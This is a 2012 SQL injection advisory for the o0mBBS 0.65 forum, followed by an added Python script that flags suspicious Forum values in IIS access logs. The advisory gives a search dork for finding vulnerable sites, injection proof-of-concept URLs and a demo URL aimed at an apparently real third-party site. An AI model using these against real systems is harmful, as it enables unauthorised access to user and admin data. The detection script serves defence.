
o0mBBS Sql Injection

Author: Asmar , Published: 12-06-2012
# --------------------------------------- #
Author : L3b-r1'z
Title : o0mBBS Sql Injection
Date : 6/12/2012
Email : L3br1z@Gmail.com
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "o0mBBS version 0.65B"
Version : 0.65
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
1) Bug :
An attacker can inject SQL into the database and steal the usernames and admin account data.
# --------------------------------------- #
2) PoC :

http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=[SQL]
http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=2'

Demo :

http://www.oasitech.it/o0m/NewTopic.asp?Type=NewTopic&Forum=2%27
# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Abu Hamid Madridi.
# --------------------------------------- #
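
A defender's check for the request pattern shown in the PoC, as an added example that is not part of the original advisory: it scans IIS W3C access logs for NewTopic.asp requests whose Forum value is not a plain integer. The log lines are constructed, and treating Forum as a numeric id is an assumption drawn from the PoC URL, not from the o0mBBS source.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed IIS W3C log excerpt (not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-06-12 10:00:01 192.0.2.10 GET /o0m/NewTopic.asp Type=NewTopic&Forum=2 200
2012-06-12 10:00:07 192.0.2.77 GET /o0m/NewTopic.asp Type=NewTopic&Forum=2%27 500
2012-06-12 10:00:09 192.0.2.77 GET /o0m/newtopic.asp Type=NewTopic&Forum=2%2527 500
2012-06-12 10:00:12 192.0.2.10 GET /o0m/Default.asp - 200
2012-06-12 10:00:15 192.0.2.78 GET /o0m/NewTopic.asp Type=NewTopic&Forum=2&Forum=x 200
"""

# Assumption: a legitimate forum id is a short run of decimal digits.
FORUM_OK = re.compile(r"[0-9]{1,9}")


def suspicious_requests(log_text):
    """Return (client ip, decoded Forum value, status) for every
    NewTopic.asp request whose Forum value is not a plain integer."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            # Column order is declared by the log itself; do not hard-code it.
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # IIS paths are case-insensitive, so compare in lower case.
        if not row.get("cs-uri-stem", "").lower().endswith("/newtopic.asp"):
            continue
        query = row.get("cs-uri-query", "-")
        # parse_qsl decodes once and yields every copy of a repeated key.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key.lower() != "forum":
                continue
            value = unquote(value)  # second decode catches %2527-style input
            if not FORUM_OK.fullmatch(value):
                hits.append((row.get("c-ip"), value, row.get("sc-status")))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule belongs in the application itself: reject a non-numeric Forum value before it reaches the query and bind it as a typed parameter.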
